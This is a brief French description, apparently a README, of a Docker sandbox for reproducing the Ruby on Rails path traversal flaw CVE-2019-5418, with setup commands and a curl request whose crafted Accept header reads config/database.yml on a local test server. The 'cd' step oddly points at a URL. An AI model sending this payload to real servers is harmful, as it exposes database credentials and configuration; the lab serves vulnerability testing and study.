
Bac à sable basé sur Docker pour reproduire et tester la vulnérabilité de traversée de chemin CVE-2019-5418 de Ruby on Rails via des en-têtes Accept personnalisés.
https://groups.google.com/forum/#!msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
$ git clone https://github.com/takeokunn/CVE-2019-5418
$ cd https://github.com/takeokunn/CVE-2019-5418
$ docker-compose up
$ curl localhost/sandbox -H 'Accept: ../../config/database.yml{{'